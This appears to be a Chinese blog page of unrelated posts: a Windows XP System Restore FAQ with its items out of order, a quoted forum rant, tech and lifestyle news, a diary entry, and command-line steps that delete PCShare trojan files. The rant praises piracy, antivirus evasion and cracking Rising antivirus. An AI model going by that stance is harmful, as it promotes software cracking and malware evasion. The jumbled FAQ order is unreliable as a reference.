利用Windows XP的系统恢复功能,用户(系统管理员和所有者)在遇到问题时可将机器还原到以前的状态。系统恢复功能自动监控系统文件的更改和某些应用程序文件的更改,记录或存储更改之前的状态。
具有系统恢复功能后,用户不必再考虑为系统保存snapshots,因为它可以自动创建易于标识的还原点,允许用户将系统还原到以前的状态。还原点在发生重大系统事件(例如,安装应用程序或驱动程序)时创建,同时也会定期(每天)创建。此外,用户还可以随时创建和命名自己的还原点。
6.谁有权使用系统恢复? 只有具有管理员权限的用户才可以使用系统恢复来恢复过去的系统状态,或调整系统恢复参数设置。但是,还原点的创建过程与管理员是否登录无关。例如,在非管理员的其他用户使用机器时,系统恢复仍将创建系统检查点和事件驱动检查点,但该用户不能使用恢复功能,只有具有管理员权限的用户才有权恢复机器状态。
7.系统恢复保护诸如WORD文档和电子邮件等用户个人数据文件吗?
不。系统恢复不监控文档、图形、电子邮件等用户个人数据文件的改变,因此也不能恢复这些文件。
系统恢复只监控一组核心系统文件和某些特定类型的应用文件(如文件后缀为exe和dll等),记录系统改变前这些文件的状态。查看所有受保护文件类型,可参阅平台SDK系统恢复部分的“受监控文件后缀”。
8.系统恢复如何处理密码问题?
不恢复的密码:
1)Windows XP密码和密码问题提示不恢复。这是为了防止还原点包括一个用户已经记不清的旧密码,从而引起混乱给用户带来不便。
2)IE和Content Advisor密码和密码问题提示不恢复。理由同上。
恢复的密码:
1)恢复诸如Windows Messenger、AOL Messenger、QQ等基于Web服务器的应用程序密码。恢复这些旧密码不会给用户带来困扰,因为机器中储存的仅是密码备份,实际密码存放在Web服务器中。
系统恢复只是恢复了应用程序存储在本地的旧密码,而不会真正改变程序密码。用户仍旧需要使用当前密码登录服务器。
2)域和主机密码与上述情况类似。一旦主机与域重新连接,cache中旧密码又会升级到当前密码。
9.如果恢复到某个应用程序安装之前,系统恢复是否会自动卸载该程序?
系统恢复不会完全卸载该应用程序。因为系统恢复只监控和恢复特定类型文件的改变,如安装该程序所引起的系统文件的改变等,因此如果要彻底清除安装某应用程序所引发的所有改变并完全卸载该应用程序,用户首先需要使用控制面板中的“添加或删除程序”选项,删除该程序。系统恢复所做的则是恢复因安装所引起的系统改变,包括:
1)删除安装时增加的受监控文件
2)恢复受监控的系统文件的改变
3)恢复注册表(注:保留部分注册表当前值)
4)安装增加或修改的非受监控文件和其他文件不可恢复,也不会被删除,如不会删除该应用程序新建的图形文件和文本文件,也不会恢复对已有的此类文件的修改。
10.为什么恢复时会删除某些下载的可执行文件?
如果下载的文件后缀属于受监控的文件类型,那么假如还原点在下载之前,这些文件将丢失。要是不想丢失这些文件的话,可以把它们移到“我的文档”文件夹或其他不受监控的硬盘区域。万一恢复时删除了有用的下载文件,还可以通过撤消本次恢复再重新获得这些文件。
用户可以在任意时候使用系统恢复wizard手工创建还原点。此外,系统将在下述情况下自动创建还原点:
1)安装设备驱动程序
2)用Windows Installer、或Install Shield Pro 7.0及其以上版本安装应用程序
3)使用自动升级进行Windows XP升级
4)执行系统恢复操作(在执行系统恢复操作时,也会创建还原点,以便需要的话,用户可以撤消本次恢复过程)
5)使用备份工具从备份介质中恢复数据
6)每隔24小时创建即日还原点
11.可以保留一个永久可用的还原点吗?
不行。目前的系统恢复体系不支持该功能。每一个还原点仅保存自上一个还原点创建之后的系统变化,这样既可以将空间占用降到最低,也可以提高性能,所有的还原点是彼此前后关联的。
因此,若要将机器从当前状态恢复到之前的某个状态,需要这两个还原点之间的所有还原点记录都可用。例如,当用户试图将机器状态从D点恢复到A点,系统恢复需要用到C点、B点和A点的所有变化记录。
如果要将某个还原点设为永久还原点,则需要耗费大量的空间来存储整个还原点链,从目前来说,这是非常不现实的。系统恢复有一个“自动还原点空间管理”功能,会自动清除最老的还原点,释放所占空间。在缺省情况下,还原点的存留时间最长是90天。
12.系统恢复需要多少硬盘空间?
1)大于4G的硬盘,缺省情况下,系统恢复占用12%的硬盘空间
2)小于4G的硬盘,缺省情况下,系统恢复仅占用400M空间
3)任意时候用户可以自行调整用于系统恢复的空间
2.Windows的哪些版本具有系统恢复功能? Windows Me和Windows XP(家庭版和专业版)。以下问题及答案主要针对Windows XP。 3.系统恢复和文件备份有什么差别?
系统恢复只监控一组核心系统文件和某些类型的应用程序文件(如后缀为exe或dll的文件),记录更改之前这些文件的状态;而备份工具则用于备份用户的个人数据文件,确保在本地磁盘或其他介质上存储一个安全副本。系统恢复不监控或恢复对个人数据文件(例如,文档、图形、电子邮件等等)所做的更改。
系统恢复的还原点中包含的系统数据只能在一段时间内进行还原,而备份工具进行的备份可以在任何时候进行还原。
4.系统恢复需要用户开启吗?
不需要。Windows XP系统恢复是自动开启的,但至少需要有200M的可用硬盘空间。如果硬盘没有200M可用空间,系统恢复将自动禁用,等到一旦有了足够的空间,又会自动开启。在缺省情况下,系统恢复最多占用12%的硬盘空间,它的“自动还原点空间管理”将清除最老的还原点,释放空间并维持系统恢复的滚动安全。
5.系统恢复会降低系统性能吗?
不会。系统恢复在监控系统运行状态时,不会对系统性能造成明显影响。创建还原点是个非常快速的过程,通常只需几秒钟。定期的系统状态检查(缺省为每24小时一次)也只在系统空闲时间进行,而不会干扰任何用户程序的运行。 晕 竟然回复这样的帖子今天在华夏BBS上竟然回复了一个这样的帖子 郁闷 之后后悔
最后还是好人做到底 发了条论坛短信 说瑞星有备份区的可以恢复 为什么会后悔 值得我去深思
=========================
告诉大家一件事! 刚才我开着电脑,开着瑞星监控(2006),
等回来一看 电脑里的几乎所有黑软都被杀干净了 其中包括许多现在都很难找到的极品
还有许多是收费资源
这垃圾什麽都没想我汇报就都给杀了
连压缩包立的都被杀的一干二净
最可气的是这全是他在后台工作的 什麽都没提示我
我说瑞星作为国产最优秀的杀毒软件之一
实在不该犯这种低级错误
大家想一想,这些软件可是我收了一年多的
劝想买正版的朋友还是算了吧
国内还有许多其他厂商也不错 干嘛非买瑞星这垃圾 刚才到他的官方网站找点话想和他理论
找了半天连个客户服务点话也没有
这垃圾赚我们的钱都用去干吗了
现在想想,他也不就是会到各大黑客网站
找我们辛辛苦苦做的黑软然后放在他的病毒库里 然后又那这那病毒库数字到处招谣状骗
真他妈垃圾 瑞星真他妈的是个大垃圾
顺便在这里对那些瑞星派来的到处找我们黑软的小白你们他妈更垃圾
本人永远支持黑软 永远支持盗版瑞星 永远支持免杀
支持各大黑客网站 支持为我们大家做黑软的高手们 瑞星我目前正在破解 等做好了发出来和朋友们共享 气死那垃圾瑞星
[aa2] 鼻子一酸,开始叭嗒叭嗒掉眼泪了 呵呵 瑞星的整个程序 的设计非常好 而且他的网络版 也是非常好的 杀毒技术有些慢 是他们的杀毒方式不一样 瑞星采用完全虚拟机杀毒技术
如果说杀毒垃圾 这个不能说明 什么 因为 几家公司 每次载获的病毒不一样 代码库也不一样
楼主 瑞星有设置免扫描区的 你可以看一下 而且 还有设置遇到病毒是否执行的动作
======================== 注:此贴回复多余 后悔!!! 最后还是好人做到底 发了条论坛短信 说瑞星有备份区的可以恢复 为什么会后悔 值得我去深思
QQ2006 Beta 1 的 3D 秀曝光前不久网上已经有传闻 3D 秀的传言, 现在终于有几幅实图供大家参考了. 是一场IM工具的革命, 还是新一轮的圈钱行动? 仁者见仁, 智者见智...请注意聊天窗口的重大变化。菜单栏没有了,取而代之的是选项卡,是否意味着QQ要整合更多的服务到新版去呢?
传说中 QQ2006-Beta1-的3D秀
『查看图三』
从截图上可以看出,新的QQ秀将不再被局限在小小的QQ秀窗口里了,背景布局也不像以前2D那样的花花绿绿显得很乱了,人物的比例更加合理,就是不知道这个“3D”是3D绘制的人物,还是用3D技术来表现QQ秀,让其具备更多的动态。这个是无法从截图上看出来的,只能等待2006 Beta1的到来了,如果是后者,QQ对机器的要求将会进一步提升,这样的改进究竟是好是坏呢?还是让用户来定夺吧!
我们再看看网友们的评论:
A:看了上面几个图我想我再也不会装QQ了 TM用用足够了
B:这么些个东西一准就是要花QB···· 说不定也没免费的3DSHOW C:俺是穷人 俺只想要用QQ来聊天 这些花里胡哨的都用不上 D:系统资源被无情的占用了 E:wow wow, 看来我得换个Client了... F:对这东西已经麻木了。腾讯就继续他的圈地运动吧。哈哈。我就不交钱 综上述来看,网友们对这个3D秀不是很好看哦,不知道腾讯方面会怎么动作. “爱情泡泡”当红娘这里是伦敦塞尔弗里奇商场,而这个坐在透明泡泡里的男士名叫达伦·撒切尔,今年39岁。他这样做可不是真人秀,也不是行为艺术,而是为了找到自己的梦中情人。 从昨天开始到情人节的5天里,“绝配”网站邀请了五名单身男士走进一个高三米的“爱情泡泡”,而每位到塞尔弗里奇商场购物的单身女性都可以通过网络与“泡泡男士”聊上一聊。 而对于女士来说,如果恰巧和哪位“泡泡男士”对上眼的话,那这种在购物中收获爱情的经历也算是够特别的了。网站和塞尔弗里奇商场还会为他们准备一份特别的礼物,帮他们度过一个难忘的约会。这些礼物包括商场购物优惠券、香槟、在伦敦顶级餐馆就餐以及浪漫的泰晤士河之旅等等。 机器出现了故障体验了一下 系统安全盾
操作不当 服务乱了
之后 昨夜22:30 关机了 当时真的很郁闷
然后 凌晨想给……发个短信 祝生日快乐
寻思163SMTP服务器到了凌晨
会发很多祝福贺卡的 就没在去打扰 之后睡觉第二天起床 用冷静耐心的心情在修理系统
不能 重新安装 磁盘都满了 C盘也保存着很多文件
之后想到了安装修复
结果 …… OK 全部都正常了
文件一个没丢 软件都完全没有改变
看电视去了 那个 演詹姆斯邦德 的人 演的电影不错
祝……生日快乐 PCSHARE木马的清理方法开始弄这个木马的时候 很多都没破解好 他是一款 反向链接的木马 PCSHARE是一款计算机远程控制软件,采用HTTP反向通信,屏幕数据线传输,驱动隐藏端口通信过程等技术,达到系统级别的隐藏. PCSHARE服务端运行后一般释放三个文件(以y开头的随机文件名),而且文件属性可以被设置为"系统"|"隐藏"|"只读" y???????.d1l (位置在%SystemRoot%\System32下) y???????.sys (位置在%SystemRoot%\System32\drivers下) 需要在安全模式下才能正常清理,附dos命令行模式下的清理方法: 首先在系统盘根目录下运行 dir y*.d1l/s/a 检测以y开头,d1l为后缀的文件 注:比如找到yuadtsdf.d1l(随机的),以下的y*都是指yuadtsdf.d1l 然后执行 attrib -r -h -s %SystemRoot%\System32\y*.d1l attrib -r -h -s %SystemRoot%\System32\y*.dll attrib -r -h -s %SystemRoot%\System32\drivers\y*.sys del %SystemRoot%\System32\y*.d1l del %SystemRoot%\System32\y*.dll del %SystemRoot%\System32\drivers\y*.sys |
||||
|
|